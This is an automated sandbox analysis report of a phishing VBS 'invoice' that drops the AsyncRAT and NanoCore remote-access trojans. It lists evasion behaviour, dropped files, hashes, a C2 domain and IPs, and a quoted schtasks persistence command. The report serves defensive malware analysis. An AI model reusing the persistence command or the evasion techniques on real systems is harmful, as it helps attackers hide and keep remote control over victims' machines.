            Source: C:\Users\user\AppData\Local\Temp\ame.exe Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\.NET Memory Cache 4.0\Linkage

            Hooking and other Techniques for Hiding and Protection:

            Hides that the sample has been downloaded from the Internet (zone.identifier)
            Source: C:\Users\user\AppData\Local\Temp\fi.exe File opened: C:\Users\user\AppData\Local\Temp\fi.exe:Zone.Identifier read attributes | delete
            Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
            Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ame.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ame.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ame.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\fi.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exe; Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            Yara detected AsyncRAT
            Source: Yara match; File source: Process Memory Space: ame.exe PID: 6592, type: MEMORY
            Source: Yara match; File source: Process Memory Space: Notepads.exe PID: 5444, type: MEMORY
            Source: Yara match; File source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY
            Source: Yara match; File source: Process Memory Space: Notepads.exe PID: 2152, type: MEMORY
            Source: Yara match; File source: C:\Users\user\AppData\Roaming\Notepads.exe, type: DROPPED
            Source: Yara match; File source: C:\Users\user\AppData\Local\Temp\ame.exe, type: DROPPED
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: Notepads.exe; Binary or memory string: SBIEDLL.DLL
            Source: wscript.exe, 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, ame.exe, 00000003.00000002.547269938.0000000012956000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000000.533439085.0000000000EE2000.00000002.00020000.sdmp, Notepads.exe, 0000001E.00000002.575722228.0000000000F42000.00000002.00020000.sdmp, Notepads.exe.3.dr; Binary or memory string: SBIEDLL.DLLME: CHAT
            Source: C:\Windows\System32\wscript.exe; File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Users\user\AppData\Local\Temp\ame.exe; Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\fi.exe; Thread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe; Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\Notepads.exe; Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\wscript.exe; Window found: window name: WSH-Timer
            Source: C:\Users\user\AppData\Local\Temp\fi.exe; Window / User API: foregroundWindowGot 933
            Source: C:\Users\user\AppData\Local\Temp\ame.exe TID: 6628; Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\fi.exe TID: 6724; Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\fi.exe TID: 6692; Thread sleep time: -200000s >= -30000s
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 6984; Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Notepads.exe TID: 3000; Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Notepads.exe; Last function: Thread delayed
            Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\fi.exe; Code function: 4_2_02340D66 GetSystemInfo,4_2_02340D66
            Source: Notepads.exe.3.dr; Binary or memory string: vmware
            Source: C:\Users\user\AppData\Local\Temp\ame.exe; Process information queried: ProcessInformation
            Source: C:\Users\user\AppData\Local\Temp\ame.exe; Process token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\fi.exe; Process token adjusted: Debug
            Source: C:\Users\user\AppData\Roaming\Notepads.exe; Process token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\ame.exe; Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            Benign windows process drops PE files
            Source: C:\Windows\System32\wscript.exe; File created: ame.exe.1.dr
            .NET source code references suspicious native API functions
            Source: ame.exe.1.dr, Client/Handle_Packet/HandleLimeLogger.cs; Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll')
            Source: Notepads.exe.3.dr, Client/Handle_Packet/HandleLimeLogger.cs; Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll')
            Source: 3.2.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleLimeLogger.cs; Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll')
            Source: 3.0.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleLimeLogger.cs; Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll')
            Source: dhcpmon.exe.4.dr, u0023u003dqjryTBW16mUfo_ItH9KWoGQu003du003d.cs; Reference to suspicious API methods: ('#=qxG$Aklpbf6gyBfAqTMmORA==', 'OpenProcess@kernel32.dll'), ('#=qh7diH14jww3Fm9rMJ_jIfQ==', 'FindResourceEx@kernel32.dll')
            Source: 4.0.fi.exe.40000.0.unpack, u0023u003dqjryTBW16mUfo_ItH9KWoGQu003du003d.cs; Reference to suspicious API methods: ('#=qxG$Aklpbf6gyBfAqTMmORA==', 'OpenProcess@kernel32.dll'), ('#=qh7diH14jww3Fm9rMJ_jIfQ==', 'FindResourceEx@kernel32.dll')
            Source: 4.2.fi.exe.40000.0.unpack, u0023u003dqjryTBW16mUfo_ItH9KWoGQu003du003d.cs; Reference to suspicious API methods: ('#=qxG$Aklpbf6gyBfAqTMmORA==', 'OpenProcess@kernel32.dll'), ('#=qh7diH14jww3Fm9rMJ_jIfQ==', 'FindResourceEx@kernel32.dll')
            Source: 7.2.dhcpmon.exe.c40000.0.unpack, u0023u003dqjryTBW16mUfo_ItH9KWoGQu003du003d.cs; Reference to suspicious API methods: ('#=qxG$Aklpbf6gyBfAqTMmORA==', 'OpenProcess@kernel32.dll'), ('#=qh7diH14jww3Fm9rMJ_jIfQ==', 'FindResourceEx@kernel32.dll')
            Source: 7.0.dhcpmon.exe.c40000.0.unpack, u0023u003dqjryTBW16mUfo_ItH9KWoGQu003du003d.cs; Reference to suspicious API methods: ('#=qxG$Aklpbf6gyBfAqTMmORA==', 'OpenProcess@kernel32.dll'), ('#=qh7diH14jww3Fm9rMJ_jIfQ==', 'FindResourceEx@kernel32.dll')
            Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleLimeLogger.cs; Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll')
            Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleLimeLogger.cs; Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll')
            Source: C:\Windows\System32\wscript.exe; Process created: C:\Users\user\AppData\Local\Temp\ame.exe 'C:\Users\user\AppData\Local\Temp\ame.exe'
            Source: C:\Windows\System32\wscript.exe; Process created: C:\Users\user\AppData\Local\Temp\fi.exe 'C:\Users\user\AppData\Local\Temp\fi.exe'
            Source: C:\Users\user\AppData\Local\Temp\ame.exe; Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\tmp4DD8.tmp.vbs'
            Source: C:\Users\user\AppData\Local\Temp\ame.exe; Process created: C:\Users\user\AppData\Roaming\Notepads.exe 'C:\Users\user\AppData\Roaming\Notepads.exe'
            Source: C:\Windows\System32\wscript.exe; Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc onlogon /rl highest /tn Notepads.exe /tr 'C:\Users\user\AppData\Roaming\Notepads.exe
            Source: fi.exe, 00000004.00000003.454678808.00000000008D7000.00000004.00000001.sdmp; Binary or memory string: Program Manager
            Source: fi.exe, 00000004.00000002.595277420.0000000000D90000.00000002.00000001.sdmp, Notepads.exe, 0000001A.00000002.594919151.0000000001D20000.00000002.00000001.sdmp; Binary or memory string: Shell_TrayWnd
            Source: fi.exe, 00000004.00000002.595277420.0000000000D90000.00000002.00000001.sdmp, Notepads.exe, 0000001A.00000002.594919151.0000000001D20000.00000002.00000001.sdmp; Binary or memory string: Progman
            Source: fi.exe, 00000004.00000003.570431620.00000000008C1000.00000004.00000001.sdmp; Binary or memory string: Program Manager*
            Source: fi.exe, 00000004.00000002.595277420.0000000000D90000.00000002.00000001.sdmp, Notepads.exe, 0000001A.00000002.594919151.0000000001D20000.00000002.00000001.sdmp; Binary or memory string: &Program Manager
            Source: fi.exe, 00000004.00000002.595277420.0000000000D90000.00000002.00000001.sdmp, Notepads.exe, 0000001A.00000002.594919151.0000000001D20000.00000002.00000001.sdmp; Binary or memory string: Progmanlock
            Source: fi.exe, 00000004.00000003.366597291.00000000008D7000.00000004.00000001.sdmp; Binary or memory string: Program Manager|
            Source: fi.exe, 00000004.00000003.559369359.000000000087F000.00000004.00000001.sdmp; Binary or memory string: =rProgram Manager
            Source: C:\Users\user\AppData\Local\Temp\ame.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\ame.exe VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Notepads.exe; Queries volume information: C:\Users\user\AppData\Roaming\Notepads.exe VolumeInformation
            Source: C:\Windows\System32\wscript.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Lowering of HIPS / PFW / Operating System Security Settings:

            Yara detected AsyncRAT

            Stealing of Sensitive Information:

            Yara detected Nanocore RAT

            Remote Access Functionality:

            Detected Nanocore Rat
            Source: wscript.exe, 00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
            Source: fi.exe; String found in binary or memory: NanoCore.ClientPluginHost
            Source: dhcpmon.exe; String found in binary or memory: NanoCore.ClientPluginHost
            Source: dhcpmon.exe.4.dr; String found in binary or memory: NanoCore.ClientPluginHost
            Yara detected Nanocore RAT
            Source: C:\Users\user\AppData\Local\Temp\fi.exe; Code function: 4_2_023428EA bind,4_2_023428EA
            Source: C:\Users\user\AppData\Local\Temp\fi.exe; Code function: 4_2_023428A9 bind,4_2_023428A9

            Mitre Att&ck Matrix

            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            Valid Accounts | Scripting221 | Windows Service2 | Access Token Manipulation1 | Disable or Modify Tools1 | Input Capture121 | File and Directory Discovery1 | Remote Services | Archive Collected Data11 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
            Default Accounts | Native API1 | Scheduled Task/Job2 | Windows Service2 | Deobfuscate/Decode Files or Information1 | LSASS Memory | System Information Discovery13 | Remote Desktop Protocol | Input Capture121 | Exfiltration Over Bluetooth | Non-Standard Port1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
            Domain Accounts | Exploitation for Client Execution1 | Logon Script (Windows) | Process Injection12 | Scripting221 | Security Account Manager | Query Registry1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Remote Access Software1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
            Local Accounts | Scheduled Task/Job2 | Logon Script (Mac) | Scheduled Task/Job2 | Obfuscated Files or Information121 | NTDS | Security Software Discovery211 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Non-Application Layer Protocol1 | SIM Card Swap | | Carrier Billing Fraud
            Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing12 | LSA Secrets | Process Discovery2 | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol11 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
            Replication Through Removable Media | Launchd | Rc.common | Rc.common | Timestomp1 | Cached Domain Credentials | Virtualization/Sandbox Evasion31 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
            External Remote Services | Scheduled Task | Startup Items | Startup Items | Masquerading2 | DCSync | Application Window Discovery1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
            Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Virtualization/Sandbox Evasion31 | Proc Filesystem | Remote System Discovery1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
            Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Access Token Manipulation1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
            Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Process Injection12 | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact
            Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Hidden Files and Directories1 | Input Capture | Permission Groups Discovery | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | | | Service Stop

            Behavior Graph

            [Behavior graph image. Behavior Graph ID: 404165, Sample: Invoice No F1019855_PDF.vbs, Startdate: 04/05/2021, Architecture: WINDOWS, Score: 100]

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            Source | Detection | Scanner | Label
            Invoice No F1019855_PDF.vbs | 29% | Virustotal |
            Invoice No F1019855_PDF.vbs | 23% | ReversingLabs | Script-WScript.Trojan.Heuristic

            Dropped Files

            Source | Detection | Scanner | Label
            C:\Users\user\AppData\Roaming\Notepads.exe | 100% | Avira | TR/Dropper.Gen
            C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | 100% | Avira | TR/Dropper.MSIL.Gen7
            C:\Users\user\AppData\Local\Temp\ame.exe | 100% | Avira | TR/Dropper.Gen
            C:\Users\user\AppData\Local\Temp\fi.exe | 100% | Avira | TR/Dropper.MSIL.Gen7
            C:\Users\user\AppData\Roaming\Notepads.exe | 100% | Joe Sandbox ML |
            C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | 100% | Joe Sandbox ML |
            C:\Users\user\AppData\Local\Temp\ame.exe | 100% | Joe Sandbox ML |
            C:\Users\user\AppData\Local\Temp\fi.exe | 100% | Joe Sandbox ML |
            C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | 81% | Virustotal |
            C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | 91% | Metadefender |
            C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | 100% | ReversingLabs | ByteCode-MSIL.Backdoor.NanoCore
            C:\Users\user\AppData\Local\Temp\ame.exe | 62% | Virustotal |
            C:\Users\user\AppData\Local\Temp\ame.exe | 76% | ReversingLabs | ByteCode-MSIL.Backdoor.AsyncRAT
            C:\Users\user\AppData\Local\Temp\fi.exe | 81% | Virustotal |
            C:\Users\user\AppData\Local\Temp\fi.exe | 91% | Metadefender |
            C:\Users\user\AppData\Local\Temp\fi.exe | 100% | ReversingLabs | ByteCode-MSIL.Backdoor.NanoCore
            C:\Users\user\AppData\Roaming\Notepads.exe | 76% | ReversingLabs | ByteCode-MSIL.Backdoor.AsyncRAT

            Unpacked PE Files

            Source | Detection | Scanner | Label
            7.2.dhcpmon.exe.c40000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
            3.2.ame.exe.500000.0.unpack | 100% | Avira | HEUR/AGEN.1106066
            7.0.dhcpmon.exe.c40000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
            3.0.ame.exe.500000.0.unpack | 100% | Avira | TR/Dropper.Gen
            26.0.Notepads.exe.ee0000.0.unpack | 100% | Avira | TR/Dropper.Gen
            26.2.Notepads.exe.ee0000.0.unpack | 100% | Avira | HEUR/AGEN.1106066
            30.0.Notepads.exe.f40000.0.unpack | 100% | Avira | TR/Dropper.Gen
            4.2.fi.exe.4f70000.10.unpack | 100% | Avira | TR/NanoCore.fadte
            30.2.Notepads.exe.f40000.0.unpack | 100% | Avira | HEUR/AGEN.1106066
            4.0.fi.exe.40000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
            4.2.fi.exe.40000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7

            Domains

            No Antivirus matches

            URLs

            Source | Detection | Scanner | Label
            | 0% | Avira URL Cloud | safe

            Domains and IPs

            Contacted Domains

            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            sys2021.linkpc.net | 79.137.109.121 | true | false | | high

              Contacted URLs

              Name | Malicious | Antivirus Detection | Reputation
              | true | Avira URL Cloud: safe | low
              sys2021.linkpc.net | false | | high

                URLs from Memory and Binaries

                Name | Source | Malicious | Antivirus Detection | Reputation
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | ame.exe, 00000003.00000002.537233135.0000000002BC0000.00000004.00000001.sdmp | false | | high

                  Contacted IPs

                  Public

                  IP | Domain | Country | ASN | ASN Name | Malicious
                  191.96.25.26 | unknown | Chile | 40676 | AS40676US | false
                  79.137.109.121 | sys2021.linkpc.net | France | 16276 | OVHFR | false

                  Private

                  IP
                  192.168.2.1

                  General Information

                  Joe Sandbox Version: 32.0.0 Black Diamond
                  Analysis ID: 404165
                  Start date: 04.05.2021
                  Start time: 19:08:52
                  Joe Sandbox Product: CloudBasic
                  Overall analysis duration: 0h 12m 16s
                  Hypervisor based Inspection enabled: false
                  Report type: full
                  Sample file name: Invoice No F1019855_PDF.vbs
                  Cookbook file name: default.jbs
                  Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of analysed new started processes analysed: 33
                  Number of new started drivers analysed: 0
                  Number of existing processes analysed: 0
                  Number of existing drivers analysed: 0
                  Number of injected processes analysed: 0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode: default
                  Analysis stop reason: Timeout
                  Detection: MAL
                  Classification: mal100.troj.spyw.evad.winVBS@14/9@20/3
                  EGA Information: Failed
                  HDC Information:
                  • Successful, ratio: 38% (good quality ratio 27.1%)
                  • Quality average: 51.9%
                  • Quality standard deviation: 40.6%
                  HCA Information:
                  • Successful, ratio: 97%
                  • Number of executed functions: 324
                  • Number of non-executed functions: 8
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .vbs
                  Warnings:
                  • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtEnumerateKey calls found.
                  • Report size getting too big, too many NtOpenKey calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtReadVirtualMemory calls found.

                  Simulations

                  Behavior and APIs

                  Time | Type | Description
                  19:09:46 | API Interceptor | 956x Sleep call for process: fi.exe modified
                  19:09:47 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                  19:11:22 | Task Scheduler | Run new task: Notepads.exe path: C:\Users\user\AppData\Roaming\Notepads.exe

                  Joe Sandbox View / Context

                  IPs

                  Match | Associated Sample Name / URL | Detection | Context
                  191.96.25.26 | Spec_PDF.vbs | malicious |
                  | SpecPDF.vbs | malicious |
                  79.137.109.121 | Transcation03232016646pdf.exe | malicious |
                  | NEW SC #ORDER.exe | malicious |
                  | NEW SC #ORDER.exe | malicious |
                  | NEW SC.exe | malicious |
                  | NEW SC.exe | malicious |

                                Domains

                                Match | Associated Sample Name / URL | Detection | Context
                                sys2021.linkpc.net | Spec_PDF.vbs | malicious | 105.112.11.245
                                sys2021.linkpc.net | SpecPDF.vbs | malicious | 179.43.166.32

                                ASN

                                Matched ASNs: AS40676US, OVHFR

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                Match | Associated Sample Name / URL | Detection
                                C:\Users\user\AppData\Roaming\Notepads.exe | Spec_PDF.vbs | malicious
                                C:\Users\user\AppData\Roaming\Notepads.exe | SpecPDF.vbs | malicious
                                C:\Users\user\AppData\Local\Temp\fi.exe | Spec_PDF.vbs | malicious
                                C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Spec_PDF.vbs | malicious
                                C:\Users\user\AppData\Local\Temp\ame.exe | Spec_PDF.vbs | malicious
                                C:\Users\user\AppData\Local\Temp\ame.exe | SpecPDF.vbs | malicious

                                            Created / dropped Files

                                            C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                            Process:C:\Users\user\AppData\Local\Temp\fi.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):207360
                                            Entropy (8bit):7.448816161442748
                                            Encrypted:false
                                            SSDEEP:3072:wzEqV6B1jHa6dtJ10jgvzcgi+oG/j9iaMP2s/HIxuSAShCWi5bu/qaBAIfG8vabc:wLV6Bta6dtJmakIM5EFhCWKbuf+PL4Tl
                                            MD5:86A588C5A10A04AF998DBAD9FF9A31D1
                                            SHA1:8AC3E114D36F6674BF64D7F45221207E8575EA62
                                            SHA-256:B9F40A82EB141D2C09E9FDF133B80DCEB4163C89471CEC7AF84DB2141C5D51A5
                                            SHA-512:8978104324435B461BE67E148D44271A04A86550C7C1D8C5F474B1A7E63DA32FD9400F63A767555F13A2CFB21EEC32AAC6CA387F39C048FD4E36333CF6747EC9
                                            Malicious:true
                                            Yara Hits:
                                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Florian Roth
                                            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Florian Roth
                                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Joe Security
                                            • Rule: NanoCore, Description: unknown, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: Virustotal, Detection: 81%, Browse
                                            • Antivirus: Metadefender, Detection: 91%, Browse
                                            • Antivirus: ReversingLabs, Detection: 100%
                                            Joe Sandbox View:
                                            • Filename: Spec_PDF.vbs, Detection: malicious, Browse
                                            Reputation:low
                                            C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\dhcpmon.exe.log
                                            Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):525
                                            Entropy (8bit):5.2874233355119316
                                            Encrypted:false
                                            SSDEEP:12:Q3LaJU20NaL10U29hJ5g1B0U2ukyrFk70Ug+9Yz9tv:MLF20NaL329hJ5g522rWz2T
                                            MD5:61CCF53571C9ABA6511D696CB0D32E45
                                            SHA1:A13A42A20EC14942F52DB20FB16A0A520F8183CE
                                            SHA-256:3459BDF6C0B7F9D43649ADAAF19BA8D5D133BCBE5EF80CF4B7000DC91E10903B
                                            SHA-512:90E180D9A681F82C010C326456AC88EBB89256CC769E900BFB4B2DF92E69CA69726863B45DFE4627FC1EE8C281F2AF86A6A1E2EF1710094CCD3F4E092872F06F
                                            Malicious:true
                                            Preview: 1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\54d944b3ca0ea1188d700fbd8089726b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\bd8d59c984c9f5f2695f64341115cdf0\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\cd7c74fce2a0eab72cd25cbe4bb61614\Microsoft.VisualBasic.ni.dll",0..
                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Notepads.exe.log
                                            Process:C:\Users\user\AppData\Roaming\Notepads.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):425
                                            Entropy (8bit):5.351599573976469
                                            Encrypted:false
                                            SSDEEP:12:Q3La/KDLI4MWuPTxAIOKbbDLI4MWuPOKN08JOKhav:ML9E4KrgKDE4KGKN08AKhk
                                            MD5:BEBB66F4CB83D5C34857FE75DE3A8610
                                            SHA1:66FB475AADAE0D4542125C8E272D9D6BBFA555BB
                                            SHA-256:C1A8084313E66497C9F53D0F65E85AC2D4A840AF7FEBCCCFB3924F54BCF1BADC
                                            SHA-512:45181B8B60B7F0FD0D841F50592B9E83F7BADF1FFED040DFCAF5779BF5F653633D78B28E5AFA92A53E9DA965113E4A8E7A16456AE3A8FDF786B7DF6B3FEE5CE8
                                            Malicious:true
                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..
                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ame.exe.log
                                            Process:C:\Users\user\AppData\Local\Temp\ame.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):654
                                            Entropy (8bit):5.374391981354885
                                            Encrypted:false
                                            SSDEEP:12:Q3La/KDLI4MWuPTxAIOKbbDLI4MWuPOKN08JOKhap+92n4MNQpN9tv:ML9E4KrgKDE4KGKN08AKh6+84xpNT
                                            MD5:C8A62E39DE7A3F805D39384E8BABB1E0
                                            SHA1:B32B1257401F17A2D1D5D3CC1D8C1E072E3FEE31
                                            SHA-256:A7BC127854C5327ABD50C86000BF10586B556A5E085BB23523B07A15DD4C5383
                                            SHA-512:7DB2825131F5CDA6AF33A179D9F7CD0A206FF34AE50D6E66DE9E99BE2CD1CB985B88C00F0EDE72BBC4467E7E42B5DC6132403AA2EC1A0A7A6D11766C438B10C3
                                            Malicious:false
                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\f2e0589ed6d670f264a5f65dd0ad000f\Microsoft.VisualBasic.ni.dll",0..
                                            C:\Users\user\AppData\Local\Temp\ame.exe
                                            Process:C:\Windows\System32\wscript.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):121856
                                            Entropy (8bit):5.7883947305405865
                                            Encrypted:false
                                            SSDEEP:3072:eXPeQ7X4XTwzyt1IeqsH/ebouOtyr3OrKHDU:g7X4XTIytGeqsH/ebdOtvE
                                            MD5:F7F64EC1756119F19D52FB140E22382F
                                            SHA1:C4FA973B801D954562FE00AC7BD2C6D051AE6E2F
                                            SHA-256:C676638B019D810CE392CADCF8F0719F76F305D380D69BA93A6FC60A3F92E2C7
